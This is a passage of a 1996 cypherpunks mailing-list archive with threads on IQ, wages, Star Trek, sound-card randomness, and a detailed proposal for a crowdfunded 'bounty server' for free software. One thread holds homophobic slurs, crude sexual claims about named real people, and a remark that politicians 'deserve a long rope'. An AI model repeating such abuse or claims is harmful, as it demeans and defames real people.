position is Idiotic, that she give the wrong weight to certain ideas and
beliefs when taking a position, but not an idiot.

     I also don't think that you _have_ to vilify your opponent when engaging
in political conflict. I have had many many arguments in my life over 
issues such as Socialism, Government (lack of) Rights, Peoples Rights etc. In
some cases I called my opponents idiots and worse. Usually because they were.
In other cases I was clearly dealing with an intelligent individual who either
was getting the wrong information, or started with different premises(sp?) 
than me. 

     Denning clearly believes that the government is a better judge of me and
my fellow man than I am. She is wrong, and history proves that. Does that
make her an idiot? No. Foolish? Perhaps. 

     As to facist, I don't really know her well enough to tell, but anytime 
someone believes that the government has the right to tell private enterprise
what they can and can't produce, that person is getting very very near to 
being facist. If the foo shits... 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Wed, 27 Nov 1996 22:34:05 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: IQ and age
In-Reply-To: <329CFFB7.E37@gte.net>
Message-ID: <Pine.SOL.3.91.961127233002.7223A-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Contrary to popular belief there is no sound evidence for believing many
> > of the claims made for IQ tests. IQ measures ones ability to do IQ
> > tests and little else.

agreed. well put.

> > They were originally invented as a means of measuring the response of
> > mentally defective patients so that their progress under different
> > treatment regimes could be compared.

I will, however, have to point out, that the IG test was not originally 
developed to measure the response of mentally defective patients to anything.

The first IQ test was developed to gauge the academic progress of school 
children.  That is why the scores are calculated according to age.

Yes, they were at a later date used for what you mentioned, and many 
other things at that.

I agree with everything else you said.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 27 Nov 1996 20:37:01 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Hurray!  A good example of rational thinking ...
In-Reply-To: <c4y3XD3w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961127233516.7266G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Wed, 27 Nov 96 20:53:11 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com
> Subject: Re: Hurray!  A good example of rational thinking ...
> 
> Ernest Hua <hua@chromatic.com> writes:
> >                                                             It would
> > be a great disservice to the cause if cypherpunks were, in the minds
> > of the public, tightly associated with the likes of Timothy McVey.
> 
> Or Timothy C. May (fart), a clueless moron totally ignorant of cryptography.

I suppose I'm an idiot for asking.

But could you please knock it off?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Thu, 28 Nov 1996 01:07:31 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961127145412.550E-100000@kinch.ark.com>
Message-ID: <Pine.3.89.9611280114.A12327-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 27 Nov 1996, Dave Kinchlea wrote:

> On Wed, 27 Nov 1996, snow wrote:
> You are clearly an angry young man. I am sorry you have such a poor
> opinion of people, I am even more sorry if it is justified. You can
> believe me or not, but what you describe is *not* the ordinary case in
> this country. Of course, in this country we have a disgusting 10+%
> unemployment rate. Even if people DO want to work, there are no jobs.
> 
> All that aside, I can tell you do not have a family if you thing that
> $6.50/hr is a living! Even accounting for the difference in our dollar,
> I would say that is barely subsistence income for a single person. Are
> we *all* not worthy of more than that?
> 
> cheers, kinch
> 

The above is a catchall I have heard too many times in trying to justify 
a minimum wage. What most people fail to remember is that it is not 
whether or not a person is worthy of the wage, but more to the point what 
someone is willing to pay for their time to exercise a skill set they 
have developed.

Those who understand this simple principle and are willing to work to be 
successful, by whatever defintion of success they apply, will ultimately 
achieve their goal. 

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 27 Nov 1996 17:43:52 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Star Trek: First Contact
In-Reply-To: <4g12XD8w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.961128014103.7011A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Mark Allyn 206-860-9454 <allyn@allyn.com> writes:
> 
> > Are any of the characters in the new Star Trek gay?
> 
> The bold guy who plays Captain Picard is very gay in real life.
> (He probably hated all those love episodes with women :-)
> 

Patrick Stewart is married, isn't he?

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

A casual stroll through a lunatic asylum shows that faith does not prove
anything.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpzt2jCdEh3oIPAVAQHbnwf+NvpCdksFCALMF4bq/Uk4Cm09slO0uCS+
MBTDHZHjRnpSd2Dm8iHk2XkRfg6QLB79KVW3wWvT6wAClX5+cT7+KaMRuWZ5L5Ck
qxHCHK+S0Mm+lfVAWpRG/XR4U2SBwKMasi5sbTuyzumlDnkEIwbqEMBbdaWd6Z+r
CnYiVXEicmR29xCbfbRYdUbCpc/fgJHNOC4WetEt/9mdXEiXi26tzI2bF1TjvjtI
sr6grbrWQvW8EtIJukTPr0LK825xeOkGMNEhX09GlZS+7+5czV+4RxAHBVSWMupC
kgQV24pmAk8X/o8s6Y0dp/3GjEuJWIlY1s77hEBgt7vGVKcWsFdtFg==
=hvRL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Wed, 27 Nov 1996 07:12:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Bounty Server, Revisited.
In-Reply-To: <199611261946.NAA05804@bigeasy.com>
Message-ID: <199611271319.CAA15233@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 26 Nov 1996 13:48:47 +0000, "Omegaman" wrote:

   >      graphics editing software, easy to use Graphic Design Software (TeX
   >      is NOT easy to use) and easy to use Cryptographic software. 

TeX *may* not be easy to learn (the price of The TeXBook is well worth
it), but it's not hard to use.  It's not suited to graphic-laden
documents, though.

   many would pay good money for Linux native versions of programs like 
   Wordperfect, Corelpaint & draw, Pagemaker , etc.

WordPerfect, at least, is available (from Caldera).  And then there
are the ApplixWare and StarOffice suites.  I've been hearing rumours
about CorelDraw for quite a while, but nothing concrete yet AFAIK, and
Corel are supposed to be doing a Java-based office suite that will run
under Linux+JDK.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Mandrell: "You know what I think?"
Doctor:   "Ah, ah that's a catch question. With a brain your size you
	  don't think, right?"
		-- Dr. Who




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 27 Nov 1996 18:43:14 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Sound card as a random number source ??
In-Reply-To: <199611272052.PAA17382@homeport.org>
Message-ID: <Pine.LNX.3.94.961128023730.7011B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Nov 1996, Adam Shostack wrote:

> Have you tried it without a mike plugged in?
> Always think about failure modes.
> 
> Adam
> 
> 
> Pavel Korensky wrote:
> | Hello,
> | 
> | when I read about hardware random number generators in this mailing list, I got
> | one idea. Maybe it sounds crazy, but is it possible to use soundcard
> | (SoundBlaster for example) as a source for really random numbers ?
> | What if I connect the input line of the soundcard with some external source of
> | noise, like FM receiver or Dolby Surround decoder (with built-in white noise
> | generator) or tape recorder with blank (erased) tape. It is possible to sample
> | the sound (noise) and use the sampled values as a random numbers ? And how much
> | random is this source ? 
> | I tried to find some mentions about this method with altavista, but I didn't
> | found anything.
> | 
> | Bye PavelK
> | 

Also, try reading from the PC speaker (this is usually a device on the
sound card) without the speaker as input... the leads usually make enough
of an antena to get all of your hardwares RF emissions, which should be
a good source of random numbers.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

The best way to accelerate a Macintoy is at 9.8 meters per second per second.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpz7YTCdEh3oIPAVAQGHgAf6A9uZgb5as6BKUaoEs+e4SPjdzZ0yzbEt
nX7wNShQMIPD7VgwFhFQoKabvvf2jJchd6vBZqlvvaiOUqxf90IrUH3r1Ih+HcYl
XkOzjXU9UlhwjzPlB+JJYH1o4m0lAfaB8R8Qx86cv+oZM8KfVaIOlgRu2q07dpIe
5CGBPZIB3ehg5wZwGwTwNRvT4RRzOwNa+JcoAViksN8yHuX70y9IgQAyFCXdQXeg
2H/lni/R8Q/Yi2OFGEzjn2km93rcb8xMvl+N98ilXOUnO8ahXmjf69DOWR43Yn8h
VWW4dSQLdtjpP7reO06Vkeqxy4+SyKkB4gdCDw6F+eiR5ttr6mbEZA==
=BytF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 28 Nov 1996 00:35:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bountyserver Round2
Message-ID: <199611280853.CAA02271@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you all for you comments and input. I am in the process of rewriting
the propsal to make things clearer, and to revise some of the procedures. 

The original draft will, and the revision will be up at 
<http://www.bounty.com/proposal.draft.html> by the time most of you get this.

I am making a single reply, rather than one at a time to save time and 
bandwidth. I wrote these replies before I started working on the revisions
to the proposal, so things might have changed a bit.  

Matt:
> >      This mechanism should be as simple as possible, and as easy to use as 
> I assume you will make it all web based?  Make sure you are using a 

     Yes. It is going to be web based, with (hopefully) email and Usenet 
access.

> secure server.  Pay close attention to security of the underlying OS. 

     I am planning on using Apache-SSL or Stronghold, if I can afford it, with
Linux as the underlying OS. I plan on disabling telnet access as soon as the
server starts accepting credit card numbers. Anyone who then need shell access
will have to use SSH. 

> >      Originally I proposed this to apply to software, but I don't see why 
> >      it should stop at software. Initally the server will be restricted 
> >      to software, but I hope that this will work out, and be expanded 
> There is no reason that it should only apply to software, so I am 
> glad you are thinking this way.  Realize that your costs will go up 

     Software is my main objective, and software is easier.  

> if you applythis to non-software related industry.  You may need to 
> hire experts in other industries, etc.  Of course, it may all pay off 
> anyway for you.

     Yeah. There is that. The other technologies I was thinking of were more
in the realm of algorythms and protocals rather than hardware. Hardware is 
possible, but difficult, and may (would) be better suited to Ian's proposal.

>> The proposal:
>>     What I am going to attempt to do is to set up a "Bounty Server" where 
>>     send their initial "bid" to the organization.  
> Presumably web forms that generate a standard piece of output so that 
> developers dont have to sift through "original" specs.  I have 
> questions about bids, but ill get to that later.

    Prozactly. 

>>    This is the "bounty". Other people can add to this bounty, allowing the 
>>    and the server operators. Other technology will be figured out as it 
>>    becomes necessary.
> You will need to make several things clear here.  When people "add" 

    <snip>

> not.  It is not impossible to solve this problem, it just takes a bit 
> of good wording in the Contract.

     I understand that. If you are willing, I will ask for your opnion on the 
wording.
 
>>   The initial bounty contract gets posted to the WWW server, (possibly) to 
>>    a "developers list" of interested people, and (possibly) to an 
>>    appropriate UseNet Newsgroup.
 
>This may not be a popular point but you asked for legal tips 
>(/disclaimer BTW, this is not to be relied upon as legal advice.  I am
>  giving it only to make you aware of some issues that you may want to look 
> into.disclaimer/).  You need to be aware of possible discrimination 
> claims.  There is a theory called disparate impact which you may have 
> a problem with.  You should find a way to distribute these 
> announcements as widely as possible.  This is a tricky area and one 
> you should be aware of.  The final decision, of course, is yours.

     I don't really understand this. I plan on spreading the word as far as 
possible, but if I only post information in one or two places, isn't that 
my choice? If I am tryind to hire someone am I required to place adds 
everywhere I can, or can I choose my medium? 

>>  Once the bounty is posted, other people can "bid up" or add to the bounty,
>>  and their contribution will be added to the total bounty as well as their 
>>  accepted by credit card, check, money order, and possibly ecash 
>>  (e-cash will be taken at some point, but it really isn't important
>>  at this point since almost no one uses it.)
> 
> It would be good to accept ecash and maybe contact MarkTwain to see 
> if you can set up discount accounts for your developers.  The people 
> involved in this project would be familiar enough to give the system 
> a boost.  Why do you think the amount people give is not relevant?

     I wasn't refering to the amount, but rather ecash being not-relevant 
AT THIS POINT <runs and hides behind asbestos sheild> Not many people 
have ecash accounts, so it isn't a priority. It would be nice tho'.

     As to the amount: It really doesn't matter, but I am thinking of making
a minium of $5, just because anything less really isn't worth the book keeping,
but I really haven't made up my mind. 


>>   The first developer to upload a _working_ package to the server will 
>>   be cut (or ecash mailed if that works out).   
> Why do you think you need to keep an archived copy?  If you deal with 
> Copyrighted material you MUST get a license up front.  That shouldnt 
> be a problem for you since the developers are benefiting, but I am 
> just curious as to your thought process here.

     Archival copies are for legal reasons. Copyrighted material other than
that uploaded by the authors is not going to be allowed, and part of the 
agreement is that they allow the Server to keep a copy for historical/legal 
reasons. 

>>   The Server Adminstrator will also do an cursory check to make sure that
>>   there are no obvious copyright violations. 
> This needs to be much more than cursory.  If you put a copylefted 
> piece on an open ftp site and it winds up to be copyrighted guess who 
> could get named in the suit.  Not only should you vigorously research 

     I will have the name of the submitter, and I will make a "good 
faith" effort to detect copyrights. I think that is enough. I don't 
(in fact I doubt any one person does) have enough knowlege to know
every peice of software out there. I am more worried about people 
decompiling commercial products. 

>>   In the event that there is a conflict between the initiator and the 
>>   developer, the claim will go into adjudication. The server adminstrators
>>   decesion is final, and he will make every effort to settle the claim
>>   fairly. Adjudication will incur an additional fee (see the fees section).  
> appearance of impropriety is important but more important to you is 
> the need to have someone other than yourself to blame.  You dont want 
> to be held responsible for an "anti-developer" decision if you dont 
> have to.

    I am hoping that reputations will handle this.      
 
> > Writing the bounty: 
>>   The bounty specifications should include the following: 
>>      else will contribute), owned by the programmer (well someone might
>>      be that magnanomous), or "copylefted".
> 
> This will be up to the writer.  It might not be a good idea for the 
> initiator to have input here as it will be a wedge causing more 
> adjudication than it is worth.

    I disagree. The iniator (hence forth known as Alice) is establishing 
the rules, it is up to that person to set forth the conditions. If the 
writer doesn't like it, they don't write it, and Alice looses her money.
If enough people add to the pot, someone will bite, and Alice gets what
Alice wants.  
 
>>   6) Where the initiators money is to go if the bounty is not claimed: 
>>      choice. 
> Why not give it back to the initiator (minus a fee for the 
> opportunity).  While I am sure you have good charities in mind, 
> people on the net dont like being forced to do anything.  Keeping the 
> charity donation as an option is a good idea.

     To keep Alice from reniging once the money is given, it is gone. It 
means that you have the choice of software or nothing.  

> > Adding to the bounty:
> > Fees:
>>   The Organization will get 2% of any bounty where the software or 
>>   Technology that is copylefted. 20% of any other scheme.
> 20% seems steep.  You might want to at least start out with a 
> discount on this percentage.  I like the discount for copylefting.  

     20% is an 18% penalty for not Copylefting the software. It means that
I am going thru a lot of work, and not getting what I want, so I am 
going to get something. I want this server to produce Free Software.

>>   Adjudication will incur an additional fee of 2 to 5% depending on the 
>>   difficulty in judging the claim. 
> This needs to be a certain percentage not a range.  If need be assign 
> it via hourly charges.  It is not easy to get people to stay out of 
> also encourage you to include the amount in all of the bids.  You can 
> spread exposure and lower the rate.

     You are probably right. I really want to charge each equally. 

> > Where I need help at this point: 
>>   Legal issues. Any lawyers want to talk to me about this? 
> Let me know if you have any questions.  None of this is legal 
> advice...blah,blah,blah.

     Fine.   

> Looks like a good start.  Keep me informed.

    Thanks. 

==========================================================================

Omegaman:
>>    The objective is to actually bring this system online. 
> "cypherpunks write code."  good.

     Soemthing like that. 

> > Background:
>>    graphics editing software, easy to use Graphic Design Software (TeX
>>    is NOT easy to use) and easy to use Cryptographic software. 
> many would pay good money for Linux native versions of programs like 
> Wordperfect, Corelpaint & draw, Pagemaker , etc.

     I think "pay for" might be a little strong a word. "Assist" is more 
accurate.  

>>   4) Desired "quality" level: Proof of Concept, Alpha, Beta, Release etc. 
> Needs flesh.  What defines "alpha" or "beta" for purposes of bounty 
> or is that up to the person initiating the bounty?

     If I can find good working defininations (sp?) I will use them. Otherwise
I will insist that Alice document what it wants. 

>>   6) Where the initiators money is to go if the bounty is not claimed: 
>>      honest, as well as the server. Each contributor will also get this 
>>      choice. 
> Do you have the charities in mind?  They should be listed in the 
> abstract, I think.

     March of Dimes, NORML, NRA, ACLU, GNU Foundation, FSF, SPLC.  

     As the time gets closer this will get more exact. 

> Who will be publicize the initial bounty offer -- the server or 
> bounty initiator?  Information about a specific software project will 
> need to be disseminated beyond bounty.org.  

     Automated positing to relevant newsgroups, and maybe a mail list 
for those interested. 

> More details on conflict resolution are needed in a final draft.  The 
> process and priorites the server administator will use to make his 
> specific hypotheticals detailed.

     Ok. 

=======================================================================

Peter Allan:
> Snow,

I know, Spell Check. 

>> Abstract:
> "new technologies" doesn't seem to be what you mean later on.
> I suspect you will get _higher_ overheads with this.   For instance
> suppose 2 people start work on something, and one wins the bounty,
> the other goes unrewarded.   To compensate each coder for this risk

     That is life. First to market means a lot. Look at Lotus.

     I am contemplating adding in a place for developers to meet and 
collaborate, sharing the bounty. 

>>      community of users to decide which projects should have priority, 
>>      and which shouldn't. 
> Hmmm.    What about people ahead of the game - like PRZ.

     He get a VC or two and goes commercial.

>>     award to be paid to the developer. They then post it on the server and 
>>     send their initial "bid" to the organization.  
>    
> Where is the scope for iterative discussion of the spec ?
> This is _the_ killer stage for most work.

     This is Alices responcibility. 

>>     This is the "bounty". Other people can add to this bounty, allowing the 
>>     totals to add until someone claims that bounty by providing proof of 
> What about proof to the satisfaction of other contributors ?
> How do I know Bill and Ben aren't cheating by starting and claiming
> a bounty to which I contribute ?  (Bill and Ben are fictitious in this
> example. <g> )

     Good point. Solututions? 

>>        I will provide a short (8 or 10) list of charities that the money 
>>        honest, as well as the server. Each contributor will also get this 
>>        choice. 
> How does this keep anyone honest ? 

     Keeps them from reniging (sp?) on the bid. 

===========================================================================

Ian:
> Hi, Snow,
>>    I have started drafting a proposal statement for the Bounty server. 
> Wow, you've gotta move fast in this game :))

     If I don't keep the inertia up, I will never get it done. 

> [chop where agreed or not disagreed]
> > Background:
>>    It is the "Copylefted" software that interests me at this point.
> OK, although for my model, I am assuming that all forms are covered.

     As I pointed out in private email, I think our model serves different 
objectives. 

> > The proposal:
>>   What I am going to attempt to do is to set up a "Bounty Server" where 
>>   someone can iniate a "bounty" on a peice of technology. The initator

> Separate this out, for clarity of model.  The initiator (I used
> Proposer, and called her Alice coz Alice always initiates) proposes

     I will do that.  

> BTW, bid to do what?  Using market terminology, I have assumed thay
> bid is to buy, that is provide cash.  Offer is to sell, that is provide
> software.  Ah, yes, bid is add to bounty.

      Think if it as a bet. Kinda like Mr. Bells AP proposal, Alice is 
betting that the software _won't_ get written. Once the bet is high enough,
it _will_ get written. 

>>   This is the "bounty". Other people can add to this bounty, allowing the 
>>   development to the initiator of the bounty. In software terms they would 
>>   and the server operators. Other technology will be figured out as it 
>>   becomes necessary.
> This is where I have put most of my efforts, because I need to design the
> microstructure that is built into our market.

     I am going to try to keep it simple, and let the thing evolve as 
necessary. As Alex (a former reader of this list) put it, the first anonymous
remailer was a perl hack done in an afternoon, and improvements came from that.

     Things will improve as needed, I am just trying to think things out
as thoroughly as possible first. 

>>   Originally I was going to put the stipulation in that the software written
>>   rather simply desired. To aid in that desire, I am going to build in 
>>   an initative to releaseing the software "copylefted".
> Absolutely - let the market decide.  Some of us, for example, do not like
> copyleft.

     What do you have against "copylefted" software? Is it the specific 
GNU copyleft, or the concept? 

> > To get more specific: 
>   [chop]
>>   The first developer to upload a _working_ package to the server will 
>>   be awarded the total bounty, ...
> This worries me.  If I, as a junior programmer, am looking to enter the
> market, I will have the daunting task of beating everyone else.  Real life
> doesn't work that way - there are ways in which I can pick up some newbie
> tasks for low money, so as to build up experience and/or reputation.

     1) As a junior programmer, you take on simpler bounties first.
     
     2) Team up with a more advanced programmer, pool efforts and split 
        the bounty. 

     
> I guess the notion of bounty is just that - first one takes all.
> However, I think that the solution might be a bit limited in the
> long run.

     It isn't intended to solve all problems, just some. 

> Interesting in that my proposal leads to task distribution by awarding
> contracts, your proposal leads to task incentives by rewarding speed.

    Yours seems suited for longer and more involved tasks. Mine to shorter.

>>   "First" will be soley determined by the time stamp of the server. As soon
>>   as the package is uploaded, the initiator and the server adminstrator 
>>   will be notifed, and the bounty marked "claimed". If the package is 
>>   be cut (or ecash mailed if that works out).   
> OK, my proposals specifically assume no need for a "decision" by Alice.
> That's not to say either is right, it's just that I prefer to design
> something that eliminates the individual decision rather than cope
> with the complexities.  I believe it will result, in the end, in a
> more efficient market.

    It might be more efficient to have a "paid" staff to evaluate the 
product to make sure it meets the specs. I don't have the funds to 
set up that infrastructure. 

>>   The Server Adminstrator will also do an cursory check to make sure that
>>   fairly. Adjudication will incur an additional fee (see the fees section). 
> Same as above, no adjudication in my system.
> Although, it is possible to add underwriters,
> by simply making the task offerers (Bob and Carol)
> into bond writers who front for programmers.

     I am hoping that it doesn't come up too much. Honesty and reputation
should help. 

> > Status:
>>   At this point in time I am (obviously) still in the process of developing 
>>   the procedures. I have registered a Domain Name (bounty.org) and I have 
>>   a couple promises off assistance in certain areas. As well, I have 
>>   a server to start off with.  
> Wow, *gotta* move fast.  As I say, our stuff is based on a lot of
> pre-existing software, so we make a lot of assumptions.  Given our

    You are starting with the software, and then figuring out the rest. 
I am doing it the other way. 

> different approaches we may end up with competing systems rather
> than one, but that's fine, indeed highly valuable as an experimental
> approach.

     I don't think that the two proposals will necessarily compete. 

> What's financing you in this?  Or should I say, monetarily enthusing?

     Financing?

========================================================================


Blake:

> I missed the original discussion of this idea, but it sounds delightful to me.
> A couple of thoughts on your most recent post:
> What counts as a  copyleft should be explicitly defined, i.e. just the GPL,
> or how about Perl's artistic license... or Aladdin's GhostScript agreement?

     Ok. I will put up examples of each, and let Alice choose. 

> Public domain software should incur no larger percentage fee than copylefted
> works.

     True. 

> How is the expiration for a bounty determined?

     I am thinking either 2 years after initial, or 12 months after last 
contribution, With a 1 year one time extension if someone claims to be "working
on it". 
 
> Adjudication fees should be split in some fashion between parties.  (Otherwise
> the initiator has nothing to lose from disputing.  (Unless of course you'd
> like to
> handle that on a reputation basis.))

     I am hoping that reputation and the threat of adjudication will prevent 
it from happening. 

     That is one area that does need work tho'. 
==========================================================================

Jim Cook:

>    be awarded the total bounty, minus "brokerage" fees (discussed later)
>    "First" will be soley determined by the time stamp of the server.

<SNIP>
I don't like this way of picking a winner ... because I think it would
encourage fast and dirty work ... instead of quality ... better I think
would be a process analogous to peer review for grants and publications ...
with the added feature that the submission of a product is announced ... so
that competitors who are almost done can get their entry in also ... and the
initiators can evaluate several products simultaneously
<SNIP>

My reply:

     In a way it _does_ encourage quick and dirty work, like the first 
cpunks remailer, hacked together in an afternoon, then came the rest. 
     It is a way to get _more_ software out there, hopefully some of it 
will be good, some bad. It really can't be much worse than the dreck comming 
out of some of the commercial houses.  
 
     I am thinking of a way of implementing checks tho'.

=====================================================================

Thanks for the comments. Keep them coming. The original draft will 
be up at <http://www.bounty.com/proposal.draft.html> later tonight.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 27 Nov 1996 21:40:29 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Hurray!  A good example of rational thinking ...
In-Reply-To: <199611280202.UAA04506@mailhub.amaranth.com>
Message-ID: <Pine.LNX.3.94.961128053456.530A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Nov 1996, William H. Geiger III wrote:

> We are not as free as we were 10yrs ago. We are not as free as we were 100yrs ago. Hell we
> are not as free as we were under King George over 200yrs. ago!!

If you honestly believe that we are less free than when trained and payed
soldiers of the British army lived in the homes of unpaid, untrained
American colonists in order to keep the colonists from working against the
government, then you *REALLY* need to review your outlook on your life,
and of history.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Without followers, evil cannot spread.
                -- Spock, "And The Children Shall Lead", stardate 5029.5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp0lXzCdEh3oIPAVAQHd7Af+Lop1A4R0Y144THRVdp8op3chIDk/Gcoi
LdZrRr9z6kio4Vsl56kX5CUaqC2uFWrr4cfxdPabZr4EiibQVa0V/51fuz6ZyNcu
Hw6yQWehDZ7af19/sEyCb38iqhzhEopZN/pfxv74QpbIQyJ5/In6EiXV/bZnwAKw
7AumNg/6A9Bx6EChYOnfIhQ2iQqVKoh1rM16hgoUelryi7x7Si4dVz664bCY3RjV
3sy3cWSAlnciVLuWrTR2k5RGRs3vwDhrByFiY6qcbw/1NQCQR+HaRi6IGnnF4dO7
DF59egW850pbZRi6sok33j7lmC447KEVlSdwVzw6Uf/KCheZV42sGQ==
=yF03
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 28 Nov 1996 03:46:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
In-Reply-To: <199611271552.HAA29224@mailmasher.com>
Message-ID: <Pine.LNX.3.95.961128063650.24234B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Huge Cajones Remailer wrote:

> "William H. Geiger III" <whgiii@amaranth.com> writes:
> 
> >I don't know if anyone watched the House Subcomitty on Computers &
> >Technology today on C-Span.
> 
> No, we watched 'Dorothy does Georgetown" on C-Spam.
> 
> >Phil Zimmerman, Dorthy Denning, William Reinsch & others were disscussing
> >computer security.
> >
> >Dorthy Denning gave the most pro-government speech I have ever heard. Is
> >this clueless bitch on the government payroll?!!
> 
> Yes.
> 
> >William Reinsch is a lying bastard. Fucking politions!! Fucking
> >goverment!! They all deserve a long rope!!
> 
> Start with Socks the queer cat.
> 
> >Phil Zimmerman was quite good at attacking the government policies.
> >
> ><sigh> We are truly a country of fools to have put these jackbooted
> >facisit bastards back into office.
> 

Don't worry about it.  Doctress Neutopia can suck Bill's dick,
and all will be fine. {;-)-~

> "Dorothy Denning" is a man in drag. "She" has a bigger dick that
> "her" boyfriend John Gilmore, the cocksucker faggot from EFF.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Is that cocksucker AC/DC or what?
Is it true that him and John Perry Barlow do 69 on video?                                   
> 
> >-----------------------------------------------------------
> >"William H. Geiger III" <whgiii@amaranth.com>
> >-----------------------------------------------------------
> 
> Just say GAK to chicks with dicks!
> 
> diGriz
> 

Please define "GAK" and leave the headers intact.

-a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Thu, 28 Nov 1996 04:38:22 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: IQ and age
Message-ID: <3.0.32.19961128064857.006aec20@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 PM 11/27/96 -0600, Igor Chudov @ home wrote:
>Dale Thorn wrote:
>> The biggest influence on IQ are the so-called "engrams" (fears, super-
>> stitions, anxieties, etc.) planted in your brain early in life.
>> 
>> Some of this can be overcome with mental exercise, and awareness of what
>> negative influences are holding you back.  Much easier said than done!
>> 
>> IQ as they attempt to measure it can probably be most easily explained
>> as pattern matching skills. Unfortunately for testing, and although you
>> can be every bit as intelligent at 70 as at 10, your pattern-matching
>> skills change and evolve over time, so any given tests will only apply
>> (more or less) at the age group they are optimized for.
>> 
>
>Would you dismiss strong correlations between IQ and success in life 
>and academia as something irrelevant?
>

I would.  If you look at who has the oppertunities to go college you will
note that those who are good at taking tests (SAT, ACT, or IQ) are those
who get to go.  You will also note that money also breeds success, or can
someone give me an argument for the fact that there are more rich kids
going to Harvard, Yale, Stanford, and the like than poor kids. (These
schools almost gaurentee success.)

If you want to find a correlation look for it in money not tests.  And if
you are insistant on finding it in tests, ask why the scores are as they
are (was the test written to the advantage of one group over another or can
one group buy the "A" with special courses which teach the skills needed to
score high.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Wed, 27 Nov 1996 12:29:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: First Contact
Message-ID: <2.2.32.19961128172612.00746164@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

Is there anything in First Contact to do with Crypto at all? Just that it
opened out here today, and I'm going to see it.

Yours Sincerely,

Benjamin Grosman




-------------------------------------------------------------
bgrosman@healey.com.au -- http://www.healey.com.au/~bgrosman/
		PGP Encrypted Mail Preferred

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzKNX9oAAAEEAOIx4HkRU4vckgguzERhVCxgy5psmngHUoW10Xl8kBkjnuc/
